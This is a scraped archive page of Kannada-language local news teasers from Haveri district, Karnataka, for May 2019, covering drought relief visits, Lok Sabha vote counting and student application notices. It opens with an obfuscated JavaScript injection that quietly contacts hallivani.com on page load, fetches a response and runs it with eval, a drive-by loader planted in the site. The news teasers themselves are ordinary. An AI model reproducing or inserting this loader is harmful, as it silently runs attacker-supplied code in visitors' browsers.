;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: May 2019

ಕುಡಿಯುವ ನೀರಿನ ಸಮಸ್ಯೆ ತ್ವರಿತವಾಗಿ ಪರಿಹರಿಸಿ: ಕಂದಾಯ ಸಚಿವ ಆರ್.ವಿ.ದೇಶಪಾಂಡೆ

ಹಾವೇರಿ: ಹಳ್ಳಿಗಳಿಗೆ ತೆರಳಿ ಜನರ ಸಮಸ್ಯೆಗಳನ್ನು ಅರಿತು ಕೆಲಸಮಾಡಿ, ಬರದ ಸಂದರ್ಭದಲ್ಲಿ ಜನರಿಗೆ ಉದ್ಯೋಗ, ಕುಡಿಯುವ ನೀರು, ಜಾನುವಾರುಗಳಿಗೆ ಮೇವಿನ…

ಬರಪೀಡಿತ ಗ್ರಾಮಗಳಿಗೆ ಕಂದಾಯ ಸಚಿವ ಆರ್.ವಿ.ದೇಶಪಾಂಡೆ ಭೇಟಿ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಬರಪೀಡಿತ ಗ್ರಾಮಗಳಾದ ಶಿಗ್ಗಾಂವ ತಾಲೂಕಿನ ಬಿಸನಹಳ್ಳಿ, ಸವಣೂರಿನ ತವರಮೆಳ್ಳಳ್ಳಿ, ಹಾವೇರಿ ತಾಲೂಕಿನ ಆಲದಕಟ್ಟಿ ಹಾಗೂ ಹೊಸಳ್ಳಿ ಗ್ರಾಮಗಳಿಗೆ…

ಕನ್ನಡ ಭವನದಲ್ಲಿ ಜರುಗಿದ ಕರ್ನಾಟಕ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿ ಸಭೆ

ಬೆಂಗಳೂರು: ಕರ್ನಾಟಕ ಸಾಹಿತ್ಯ ಅಕಾಡೆಮಿಯ ಸ್ಥಾಯಿ ಸಮಿತಿ ಸಭೆ ಅಕಾಡೆಮಿಯ ಕನ್ನಡ ಭವನದಲ್ಲಿ ಡಾ.ಅರವಿಂದ್ ಮಾಲಗತ್ತಿ ಅಧ್ಯಕ್ಷತೆಯಲ್ಲಿ ಸೋಮವಾರ ಜರುಗಿತು….

ಡೋಲು ಮತ್ತು ನಾದಸ್ವರ ತರಬೇತಿಗೆ ಸವಿತಾ ಸಮಾಜದ ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಹಿಂದುಳಿದ ವರ್ಗಗಳ ಕಲ್ಯಾಣ ಇಲಾಖೆಯಿಂದ 2019-20ನೇ ಸಾಲಿಗೆ ಸವಿತಾ ಸಮಾಜದ ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಪಾರಂಪರಿಕ ಕಲೆಗಳಾದ ಡೋಲು ಮತ್ತು ನಾದಸ್ವರ…

ಮಹಿಳಾ ಬೀದಿನಾಟಕ – ಸಂಗೀತ ಕಲಾ ತಂಡಗಳಿಂದ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಗ್ರಾಮೀಣ ಪ್ರದೇಶದಲ್ಲಿ 2019-20ನೇ ಸಾಲಿನಲ್ಲಿ ಸರ್ಕಾರದ ವಿವಿಧ ಅಭಿವೃದ್ಧಿ ಕಾರ್ಯಕ್ರಮಗಳ ವಿಷಯಾಧಾರಿತ ಬೀದಿನಾಟಕ ಹಾಗೂ ಸಂಗೀತ ಕಾರ್ಯಕ್ರಮಗಳ…

ಪ್ರೋತ್ಸಾಹಧನಕ್ಕಾಗಿ ಎಸ್.ಸಿ., ಎಸ್.ಟಿ. ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಕಳೆದ 2018-19ನೇ ಸಾಲಿನಲ್ಲಿ ದ್ವಿತೀಯ ಪಿ.ಯು.ಸಿ.ಪದವಿ ಮತ್ತು ಉನ್ನತ ಶಿಕ್ಷಣ ಕೋರ್ಸುಗಳಲ್ಲಿ ಅಂತಿಮ ವರ್ಷದಲ್ಲಿ ಪ್ರಥಮ ಯತ್ನದಲ್ಲಿ ಪ್ರಥಮ…

ರಾಜ್ಯ ಸಮ್ಮಿಶ್ರ ಸರಕಾರ ಸುಭದ್ರ, ನಾಲ್ಕು ವರ್ಷ ಕುಮಾರಸ್ವಾಮಿ ಸಿಎಂ: ಜಿ ಪರಮೇಶ್ವರ

ಬೆಂಗಳೂರು: ಎಲ್ಲ ಮೈತ್ರಿ ಸರಕಾರದ ಶಾಸಕರು ನಮ್ಮ ಬಳಿಯೇ ಇದ್ದು, ಲೋಕಸಭಾ ಚುನಾವಣೆಯ ಫಲಿತಾಂಶ ಸಮ್ಮಿಶ್ರ ಸರಕಾರದ ಮೇಲೆ ಯಾವುದೇ…

ಲೋಕಸಭಾ ಸಮರ: ಹ್ಯಾಟ್ರಿಕ್ ಗೆಲುವು ಸಾಧಿಸಿದ ಬಿಜೆಪಿ ಅಭ್ಯರ್ಥಿ ಶಿವಕುಮಾರ ಉದಾಸಿ

ಹಾವೇರಿ: 17ನೇ ಲೋಕಸಭೆಯ ಸಾರ್ವತ್ರಿಕ ಚುನಾವ ಣೆಯಲ್ಲಿ ಹಾವೇರಿ ಕ್ಷೇತ್ರದಿಂದ ಬಿಜೆಪಿ ಅಭ್ಯರ್ಥಿ ಶಿವಕು ಮಾರ ಉದಾಸಿ 6,83,660 ಮತಗಳನ್ನು…

ಮೇ 22 ರಂದು ಸವಣೂರಲ್ಲಿ ಎಸಿಬಿಯಿಂದ ಜನಸಂಪರ್ಕ ಸಭೆ ಹಾಗೂ ಅಹವಾಲು ಸ್ವೀಕಾರ

ಹಾವೇರಿ: ಹಾವೇರಿ ಜಿಲ್ಲೆಯ ಭ್ರಷ್ಟಾಚಾರ ನಿಗ್ರಹದಳದಿಂದ ಜನಸಂಪರ್ಕ ಸಭೆ ಹಾಗೂ ಸಾರ್ವಜನಿಕರ ಅಹವಾಲು ಸ್ವೀಕಾರ ಕಾರ್ಯಕ್ರಮವನ್ನು ಸವಣೂರು ತಹಶೀಲ್ದಾರ ಕಚೇರಿ…

ಅರಿವು ಸಾಲ ಸೌಲಭ್ಯ ಪಡೆಯಲು ಅಲ್ಪಸಂಖ್ಯಾತ ವಿದ್ಯಾರ್ಥಿಗಳಿಂದ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಕರ್ನಾಟಕ ಪರೀಕ್ಷಾ ಪ್ರಾಧಿಕಾರ ನಡೆಸುವ ಸಿಟಿಟಿ, ಪಿಜಿಸಿಇಟಿ, ಡಿಸಿಇಟಿ ಮೂಲಕ ವಿವಿಧ ವೃತ್ತಿಪರ ಕೋರ್ಸ್‍ಗಳ ವ್ಯಾಸಂಗಕ್ಕೆ ಪ್ರವೇಶ ಪಡೆಯುವ…

ಶಿಗ್ಗಾಂವ ತಾಲೂಕಿನ ವಿವಿಧ ಬಿ.ಸಿ.ಎಂ. ಹಾಸ್ಟೇಲ್ ಪ್ರವೇಶಕ್ಕೆ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಶಿಗ್ಗಾಂವ ತಾಲೂಕಿನಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತಿರುವ ಹಿಂದುಳಿದ ವರ್ಗಗಳ ಇಲಾಖೆಯ ಮೆಟ್ರಿಕ್ ಪೂರ್ವ ವಿದ್ಯಾರ್ಥಿ ನಿಲಯಗಳಲ್ಲಿ ಖಾಲಿ ಇರುವ ಸ್ಥಳಗಳ ಪ್ರವೇಶಕ್ಕೆ…

ಆರೋಗ್ಯವಂತರು ಸ್ವಯಂ ಪ್ರೇರಣೆಯಿಂದ ರಕ್ತದಾನ ಮಾಡಿ: ಡಾ.ಎಚ್.ಎಸ್.ರಾಘವೇಂದ್ರಸ್ವಾಮಿ

ಹಾವೇರಿ: ರಕ್ತದಾನಕ್ಕೆ ಜೀವದಾನ ಮಾಡುವ ಶಕ್ತಿ ಇದ್ದು, ಆರೋಗ್ಯವಂತರು ಸ್ವಯಂ ಪ್ರೇರಣೆಯಿಂದ ರಕ್ತದಾನ ಮಾಡಲು ಮುಂದಾಗಬೇಕೆಂದು ಜಿಲ್ಲಾ ಆರೋಗ್ಯ ಮತ್ತು…

ನಗರ ಹಾಗೂ ಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳ ಸಾರ್ವತ್ರಿಕ ಚುನಾವಣೆ : ವೆಚ್ಚ ವೀಕ್ಷಕರಿಗೆ ಲೈಜನ್ ಅಧಿಕಾರಿ ನೇಮಕ

ಹಾವೇರಿ: ನಗರ ಹಾಗೂ ಸ್ಥಳೀಯ ಸಂಸ್ಥೆಗಳ ಸಾರ್ವತ್ರಿಕ ಚುನಾವಣಾ ವೆಚ್ಚ ವೀಕ್ಷಕರಾದ ಧಾರವಾಡ ಕೆ.ಎನ್.ಎನ್.ಎಲ್. ಡೆಪ್ಯೂಟಿ ಕಂಟ್ರೋಲರ್ ವರದರಾಜು ಎನ್.ಎಸ್….

ರಾಣೇಬೆನ್ನೂರು ತಾಲೂಕು ವಿದ್ಯಾರ್ಥಿ ನಿಲಯಗಳ ಪ್ರವೇಶಕ್ಕೆ ಅರ್ಜಿ ಆಹ್ವಾನ

ರಾಣೇಬೆನ್ನೂರು : ಹಿಂದುಳಿದ ವರ್ಗಗಳ ಕಲ್ಯಾಣ ಇಲಾಖೆ ವತಿಯಿಂದ ರಾಣೇಬೆನ್ನೂ ರು ತಾಲೂಕಿನಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಡಿ.ದೇವರಾಜ ಅರಸು ಹಿಂದುಳಿದ ವರ್ಗಗಳ…

ಮತ ಎಣಿಕೆ ಕಾರ್ಯವನ್ನು ಪಾರದರ್ಶಕ ಹಾಗೂ ಸೂಕ್ಷ್ಮವಾಗಿ ನಿರ್ವಹಿಸಿ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ ಸಲಹೆ

ಹಾವೇರಿ: ಮತ ಎಣಿಕೆ ಕಾರ್ಯಕ್ರಮವನ್ನು ಅತ್ಯಂತ ಪಾರದರ್ಶಕವಾಗಿ ಹಾಗೂ ಸೂಕ್ಷ್ಮ ವಾಗಿ ನಿಭಾಯಿಸಿ ಎಂದು ಎಣಿಕೆ ಸಿಬ್ಬಂದಿ ಹಾಗೂ ಮೇಲ್ವಿಚಾರಕರಿಗೆ…

ಲೋಕಸಮರ ಗುರುವಾರ ಮತ ಎಣಿಕೆಗೆ ಸಕಲ ಸಿದ್ಧತೆ ಜಿಲ್ಲೆಯಾದ್ಯಂತ ನಿಷೇಧಾಜ್ಞೆ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ಹಾವೇರಿ ಲೋಕಸಭಾ ಕ್ಷೇತ್ರದ ಸಾರ್ವತ್ರಿಕ ಚುನಾವಣೆಯ ಮತ ಎಣಿಕೆ ಇದೇ ಮೇ 23ರ ಗುರುವಾರ ಬೆಳಿಗ್ಗೆ 8 ಗಂಟೆಯಿಂದ…

ಮಹಿಳಾ ಪೋಲಿಸ್ ಹುದ್ದೆ ನೇಮಕಾತಿಗೆ ಅರ್ಜಿ ಆಹ್ವಾನ

ಹಾವೇರಿ: ಭಾರತೀಯ ಭೂಸೇನೆಯಲ್ಲಿ ಮಿಲಿಟರಿ ಮಹಿ ಳಾ ಪೋಲಿಸ್ ಹುದ್ದೆಯನ ನೇಮಕಾತಿಗಾಗಿ ಅರ್ಜಿ ಆಹ್ವಾ ನಿಸಲಾಗಿದೆ. ಎಸ್ಸೆಸ್ಸೆಲ್ಸಿಯಲ್ಲಿ ಶೇ.45ರಷ್ಟು ಅಂಕಗಳೊಂದಿ…